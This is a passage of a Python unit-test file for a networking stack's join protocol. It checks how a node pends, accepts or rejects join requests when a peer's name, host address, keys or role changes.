alpha.keep.pendRemote(alphaRemote)
oldRole = 'beta'
newRole = 'beta_new'
# Name: Old
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Computed
# Fuid: Either
# Leid: 0
# Reid: Either
# Role: New
self.assertIs(beta.local.role, oldRole)
beta.local.role = newRole
beta.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Ensure alpha knows nothing about the new role
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Join with updated role
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
# Assert alphaRemote is modified
self.assertFalse(self.sameAll(alphaRemote, keep))
self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
self.assertEqual(alphaRemote.role, newRole)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
self.assertIs(betaRemote.acceptance, None)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousPendingPendSameAll(self):
'''
Test joinent pend vacuous join with same all from pending remote (G1)
'''
console.terse("{0}\n".format(self.testJoinentVacuousPendingPendSameAll.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapStacks()
alpha.keep.auto = raeting.AutoMode.never.value
# Mutable: Either
alpha.mutable = True
# Vacuous: Yes
betaRemote = beta.addRemote(estating.RemoteEstate(stack=beta,
fuid=0, # vacuous join
sid=0, # always 0 for join
ha=alpha.local.ha))
# Ephemeral: No Name (the name is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
alpha.addRemote(alphaRemote)
alpha.keep.pendRemote(alphaRemote)
# Ensure remote status is Pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Computed
# Fuid: Old
# Leid: 0
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(alphaRemote)
# Join
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertIs(remoteData['fuid'], betaRemote.nuid) # new value
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentVacuousEphemeralPendingPendSameAll(self):
'''
Test joinent pend vacuous ephemeral join with same all from pending remote (G2)
'''
console.terse("{0}\n".format(self.testJoinentVacuousEphemeralPendingPendSameAll.__doc__))
# Status: Pending
# Mode: Never
alpha, beta = self.bootstrapJoinedRemotes()
alpha.keep.pendRemote(alpha.remotes.values()[0])
alpha.removeRemote(alpha.remotes.values()[0])
beta.removeRemote(beta.remotes.values()[0])
# Mutable: Either
alpha.mutable = True
# AutoMode: Never
alpha.keep.auto = raeting.AutoMode.never.value
# Ensure the next join would be ephemeral
self.assertIs(len(alpha.remotes), 0)
self.assertIs(len(alpha.nameRemotes), 0)
# Ensure remote role is pending
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Name: Body
# Main: Body
# Kind: Body
# RHA: Header
# Nuid: Computed
# Fuid: Header
# Leid: 0
# Reid: Header
# Role: Body
# Keys: Body
# Sameness: SameAll
alpha.clearStats()
beta.clearStats()
# Join
self.join(beta, alpha)
# Action: Pend, Add, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 1)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIs(alpha.remotes.values()[0].acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIsNot(remoteData, None)
self.assertEqual(remoteData['role'], beta.local.role)
self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
# Accept the transaction
alphaRemote = alpha.remotes.values()[0]
alpha.keep.acceptRemote(alphaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(alpha.mutable)
self.assertIs(beta.mutable, None)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = alpha.keep.loadRemoteData(beta.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(alphaRemote, remoteData))
# Check role/keys dump
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], beta.local.role)
self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewName(self):
'''
Test immutable joinent reject non-vacuous join with an updated name (H1)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewName.__doc__))
# Status: None (auto accept keys)
# Mode: Never, Once, Always (use Always as most loyal
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Name: New
beta.name = 'beta_new'
# Main: Old
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewMain(self):
'''
Test immutable joinent reject non-vacuous join with an updated main (H2)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewMain.__doc__))
# Status: None (auto accept keys)
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
oldMain = None
newMain = True
# Name: Either
# Main: New
self.assertIs(beta.main, oldMain)
beta.main = newMain
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewKind(self):
'''
Test immutable joinent reject non-vacuous join with an updated kind (H3)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewKind.__doc__))
# Status: None (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
oldKind = None
newKind = 33
# Name: Either
# Main: Either
# Kind: New
self.assertIs(beta.kind, oldKind)
beta.kind = newKind
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, nack
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewRha(self):
'''
Test immutable joinent reject non-vacuous join with an updated remote host address (H4)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewRha.__doc__))
# Status: None (auto accept keys)
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: No
self.assertIs(alpha.mutable, None)
# Simulate: alpha already know beta with ha=('127.0.0.1', 7532)
# beta connects with ha=('127.0.0.1', 7531)
oldHa = (beta.local.ha[0], 7532)
newHa = (beta.local.ha[0], beta.local.ha[1])
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=oldHa,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Name: Either
# Main: Either
# Appl: Either
# RHA: New: alpha remote ha is set to (127.0.0.1, 7532)
# new ha received from beta is (127.0.0.1, 7531)
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
self.assertEqual(alphaRemote.ha, oldHa)
self.assertEqual(beta.local.ha, newHa)
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, nack
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewFuid(self):
'''
Test immutable joinent reject non-vacuous join with an updated fuid (H5)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewFuid.__doc__))
# Status: None (auto accept keys)
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Simulate: alpha already know beta with fuid=33
# beta connects with a new fuid=newFuid
oldFuid = 33
newFuid = betaRemote.nuid
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=oldFuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: New: alphaRemote has uid=33 that is 'old', betaRemote has uid=2
# Leid: Old
# Reid: New
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Reject, nack
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaRemote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewKeys(self):
'''
Test immutable joinent reject non-vacuous join with an updated keys (H6)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewKeys.__doc__))
# Status: None (auto accept keys)
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Old
# Keys: New
beta.local.signer = nacling.Signer()
beta.local.priver = nacling.Privateer()
beta.dumpLocalRole()
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(remote.acceptance, None)
self.assertEqual(len(alpha.remotes), 1)
self.assertEqual(len(alpha.nameRemotes), 1)
self.assertEqual(len(beta.remotes), 0)
self.assertEqual(len(beta.nameRemotes), 0)
# Assert alphaREmote isn't modified
self.assertTrue(self.sameAll(alphaRemote, keep))
self.assertIn('joinent_transaction_failure', alpha.stats)
self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
self.assertIn('joiner_transaction_failure', beta.stats)
self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
# Assert remote and role aren't dumped
remoteData = alpha.keep.loadRemoteData(beta.local.name)
self.assertIs(remoteData, None)
roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
self.assertEqual(roleData['role'], beta.local.role)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinentNonVacuousImmutableRejectNewRole(self):
'''
Test immutable joinent reject non-vacuous join with an updated role (H7)
'''
console.terse("{0}\n".format(self.testJoinentNonVacuousImmutableRejectNewRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always (use always as most loyal)
alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.always.value)
# Mutable: No
self.assertIs(alpha.mutable, None)
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha)
# Ephemeral: No Nuid (the Nuid is known)
alphaRemote = estating.RemoteEstate(stack=alpha,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
oldRole = 'beta'
newRole = 'beta_new'
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: New
self.assertIs(beta.local.role, oldRole)
beta.local.role = newRole
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(alphaRemote)
# Ensure remote status is None
roleData = alpha.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
roleData = alpha.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertIs(roleData['verhex'], None)
self.assertIs(roleData['pubhex'], None)
# Test
